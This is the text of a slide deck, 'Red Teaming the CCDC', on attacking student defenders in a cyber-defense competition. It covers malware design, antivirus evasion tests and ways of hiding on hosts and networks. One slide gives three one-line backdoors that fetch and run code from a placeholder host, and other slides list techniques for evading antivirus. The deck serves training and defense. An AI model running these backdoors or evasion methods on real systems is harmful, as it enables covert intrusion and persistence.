SlideShare une entreprise Scribd logo

Red teaming the CCDC

S
scriptjunkie
Technologie
1  sur  54
Télécharger pour lire hors ligne
Red Teaming the CCDC hacking the most paranoid student system administrators in the nation Matt “scriptjunkie” Weeks
Some funny things Our mistakes and yours
No, don’t start “aCcbsXoAIfRsU”
Those other people logged-in are not your friends.
You planned to get hacked?
This  VNC
A year of curating red team wallpaper
Gotta keep up with changing memes
The red team has you
Screenshot inception!
Personal Favorite  https://www.youtube.com/watch?v=TrnUO6TLrtE
The malware games Challenges writing malware
Requirements  Full-featured RAT  File access  Interactive shell  Screenshots, keylogger  May include stealth features  Basic backdoors  Used for re-establishing full-featured RAT  Simple command and/or shellcode execution  Callback or listening  Keylogger/persistent monitoring  File packing tools  Worms – every method possible
Compatibility is hard Windows XP – Win 8.1 Hook-based keylogging fails… *NIX’s Make Windows look great No two Linux distros startup the same OS X(!) NetBSD OpenBSD FreeBSD X64/x86 OpenIndiana (Solaris) Ubuntu Fedora Linux Mint
But hard work pays off, kids
On-the-fly backdoors  Usually you are caught off-guard with at least one system  Webshell collections are your friend  Scripting skills are a must while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done eval(urllib2.urlopen('http://a.bc/def').read()) echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
First world red team problems: I accidentally six or seven keylogger copies
On Antivirus -or- why does everybody use MBAM?
Process Write malware Does AV detect? Yes Look for shady code Obfuscate functions, strings Done! No
But usually Write malware Does AV detect? Done! No
AV test lab  Top market share AV’s (Internet Security Suite version) on default settings  7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
Why not VirusTotal?
Test 1: Widely known malware with 1 byte appended  The only way to fail is by using giant hash lists instead of real signatures FAIL WIN FAIL WINFAIL FAILFAILFAIL WIN WIN WIN WIN
Test 2: Malware with public code samples FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
Test 3: One-off malware with no evasions FAIL FAIL FAIL FAIL FAIL FAIL INDECISIVE FAIL WINWIN WININDECISIVE
Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
Test 5: “The Kraken” – Sneaky firewall- evading malware FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL WIN
Test 6: Worm with no evasions FAIL FAIL FAIL FAIL FAIL FAIL WIN WINFAIL Hosed VMFAILFAIL
Test 7: Legit program used maliciously FAIL FAIL FAIL FAILFAIL FAIL FAIL FAIL FAIL FAIL FAILINDECISIVE
Notes  Symantec was only AV to detect reverse meterpreter on the wire  Kaspersky’s behavioral emulation detected one worm well  Kaspersky and Comodo both recognized at least one piece of malware as unusual, (not on whitelist) but not necessarily bad  Trend Micro was only AV to block hash dumping  Panda, Avast gave errors installing and were not tested
Final standings 100% FAIL meh 100% FAIL TIED 1st100% FAIL 100% FAILFAILFAIL meh TIED 1st 3rd meh
Just kidding. After 2 hours obfuscating, these are the real final standings: FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
How do I bypass AV?  Write your own stuff  Dynamically resolve API calls  Obfuscate strings  Introduce environmental/system dependencies to generically thwart sandboxing  Write your own stuff  Impersonate legitimate software  Watch what hits disk  Digitally sign your stuff if you can  Write your own stuff
Security Software Lessons  Some AV’s are a total fail  MalwareBytes Pro is in this list with MS, McAfee, F-Secure  Many have one really cool feature or heuristic  Kaspersky, Symantec, Trend Micro  All can be bypassed easily for most malware  Only detection remaining after 2 hours was one worm vs Kaspersky
Hiding from the students
Hiding from the students  Host hiding  Hide while running  Hide start  Meterpreter is great for functionality, bad for persistence  Mostly custom malware  Mostly standard persistence methods  Don’t run in your own process  Don’t use any of those toy languages with dependencies  Use C!
Don’t hide stuff rootkit finders look for
Don’t sweat the one-offs
Hiding on the wires  Hiding from Wireshark  Harder than hiding on host  Try to blend in with normal traffic  Throw Wireshark crashers  Remove packets from view  Hiding from netstat/tcpview  Using HTTP(S) instead of TCP callbacks doesn’t leave connection open  If that fails, blend in by using common ports and cloud IP’s  Migrate session to web browser or critical process
Hiding on the wires  Use every protocol that gets out  TCP  UDP  HTTPS  DNS  Use hop points in cloud/web hosting  Use file sharing/paste/social media sites  Random callback selection and delays to avoid monitors  Any way students can send or receive info, you can too
Dealing with firewalls  Two types  Host  Network  Host firewalls  Usually don’t stop outbound traffic  Can go underneath, watch raw packets  Frequently add exceptions or drop the firewall
Network firewalls  Great to own  Tough if you don’t  Use service ports since they must be able to reach the hosts
Defenses that hurt  Patch or block RCE’s  Strict inbound and outbound network firewall rules  Traffic monitoring  Different passwords on all the boxes  Pull the plug  Reverting (sometimes)  Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you
Questions @scriptjunkie1 https://scriptjunkie.us/

Recommandé

The Infosec Revival
The Infosec RevivalThe Infosec Revival
The Infosec Revivalscriptjunkie
 
The Infosec Revival
The Infosec RevivalThe Infosec Revival
The Infosec Revivalscriptjunkie
 
Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Chris Nickerson
 
Flipping the script
Flipping the scriptFlipping the script
Flipping the scriptChris Nickerson
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedNCC Group
 
Password Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPassword Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPrasad Pawar
 

Recommandé

The Infosec Revival
The Infosec RevivalThe Infosec Revival
The Infosec Revivalscriptjunkie
 
The Infosec Revival
The Infosec RevivalThe Infosec Revival
The Infosec Revivalscriptjunkie
 
Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Chris Nickerson
 
Flipping the script
Flipping the scriptFlipping the script
Flipping the scriptChris Nickerson
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedNCC Group
 
Password Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPassword Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPrasad Pawar
 
Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityPriyanka Aash
 
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Eric Kolb
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19SelectedPresentations
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs
 
Top Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesTop Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesPeter Wood
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockoutJohn Parkinson
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy MechanismsSecuRing
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)Zoltan Balazs
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.commariagoel7
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Paul Haskell-Dowland
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt Baumgartner
 
Security
SecuritySecurity
SecurityPrajwal Panchmahalkar
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Advanced mainframe hacking
Advanced mainframe hackingAdvanced mainframe hacking
Advanced mainframe hackingPhilip Young
 
Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 201244CON
 

Contenu connexe

Tendances

Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityPriyanka Aash
 
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Eric Kolb
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs
 
Top Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesTop Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesPeter Wood
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockoutJohn Parkinson
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy MechanismsSecuRing
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)Zoltan Balazs
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.commariagoel7
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Paul Haskell-Dowland
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt Baumgartner
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 

Tendances (20)

Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-security
 
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security System
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
 
Top Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesTop Five Internal Security Vulnerabilities
Top Five Internal Security Vulnerabilities
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.com
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012
 
Security
SecuritySecurity
Security
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 

En vedette

Advanced mainframe hacking
Advanced mainframe hackingAdvanced mainframe hacking
Advanced mainframe hackingPhilip Young
 
Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 201244CON
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Olga Kochetova
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Introduction to Apache Accumulo
Introduction to Apache AccumuloIntroduction to Apache Accumulo
Introduction to Apache AccumuloJared Winick
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Adventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable FunAdventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable Funarbitrarycode
 
Python Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and GeventPython Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and Geventemptysquare
 

En vedette (9)

Advanced mainframe hacking
Advanced mainframe hackingAdvanced mainframe hacking
Advanced mainframe hacking
 
Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Introduction to Apache Accumulo
Introduction to Apache AccumuloIntroduction to Apache Accumulo
Introduction to Apache Accumulo
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Adventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable FunAdventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable Fun
 
Python Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and GeventPython Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and Gevent
 

Similaire à Red teaming the CCDC

Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
Rob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesRob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesArea41
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
 
Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationTom Eston
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Chaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosChaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosCharity Majors
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encodingtechnology_flow
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Adrian Sanabria
 
JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816Jeff Conrad
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
Securing Rails
Securing RailsSecuring Rails
Securing RailsAlex Payne
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 

Similaire à Red teaming the CCDC (20)

Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
Netforts
Netforts Netforts
Netforts
 
Rob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesRob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost Stories
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
 
Old Linux Security Talk
Old Linux Security TalkOld Linux Security Talk
Old Linux Security Talk
 
Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and Exploitation
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Chaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosChaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just Chaos
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
 
JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
Malware
MalwareMalware
Malware
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
Securing Rails
Securing RailsSecuring Rails
Securing Rails
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 

Dernier

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
